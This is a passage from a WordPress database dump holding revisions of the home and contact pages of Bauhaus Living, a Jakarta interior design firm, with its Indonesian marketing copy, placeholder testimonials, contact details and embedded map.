src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-03.jpg\" alt=\" High Quality, Effective &#038; Inspiring Built Space\">\n							</a>\n									24\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								High Quality, Effective &#038; Inspiring Built Space							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									22\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-25 10:42:07','2023-09-25 10:42:07','',22,'https://bauhaus.futuremediatrix.com/?p=4971',0,'revision','',0),(4972,3,'2023-09-26 09:01:37','2023-09-26 09:01:37','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 09:01:37','2023-09-26 09:01:37','',40,'https://bauhaus.futuremediatrix.com/?p=4972',0,'revision','',0),(4973,3,'2023-09-26 09:01:37','2023-09-26 09:01:37','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini untuk konsultasi gratis dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 09:01:37','2023-09-26 09:01:37','',40,'https://bauhaus.futuremediatrix.com/?p=4973',0,'revision','',0),(4974,3,'2023-09-26 09:01:37','2023-09-26 09:01:37','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a href=\"https://goo.gl/maps/aDtccje1G7M53R3E8\">BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620</a>								</li>\n											</ul>\n											<a href=\"https://bauhaus.futuremediatrix.com/ \"   >\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_desktop\" \n					style=\"width:157px ; height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_mobile\" \n					style=\"width:157px ;  height:40px\" \n				/>\n				<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Logo-white.png\" \n					alt=\"Bauhaus Living\" \n					class=\"logo_sticky\" \n					style=\"width:157px ; height:40px\" \n				/>\n							</a>\n							<h3>contact us </h3>\n														<h2>\n								Write anytime							</h2>\n		[contact-form-7 id=\"884\" title=\"Contact page\"]		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-google_maps .elementor-widget-container{overflow:hidden}.elementor-widget-google_maps iframe{height:300px}</style>		\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"\n					src=\"https://maps.google.com/maps?q=Jl.%20Jalur%2020%20blok%2022%20no.%2017%2C%20Meruya%20Utara%20Kembangan%2C%20Jakarta%20Barat%2011620&#038;t=m&#038;z=14&#038;output=embed&#038;iwloc=near\"\n					title=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n					aria-label=\"Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\"\n			></iframe>','Contact','','inherit','closed','closed','','40-revision-v1','','','2023-09-26 09:01:37','2023-09-26 09:01:37','',40,'https://bauhaus.futuremediatrix.com/?p=4974',0,'revision','',0),(4975,3,'2023-09-26 13:14:13','2023-09-26 13:14:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-03.jpg\" alt=\" High Quality, Effective &#038; Inspiring Built Space\">\n							</a>\n									24\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								High Quality, Effective &#038; Inspiring Built Space							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									22\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-26 13:14:13','2023-09-26 13:14:13','',22,'https://bauhaus.futuremediatrix.com/?p=4975',0,'revision','',0),(4976,3,'2023-09-26 13:14:13','2023-09-26 13:14:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami 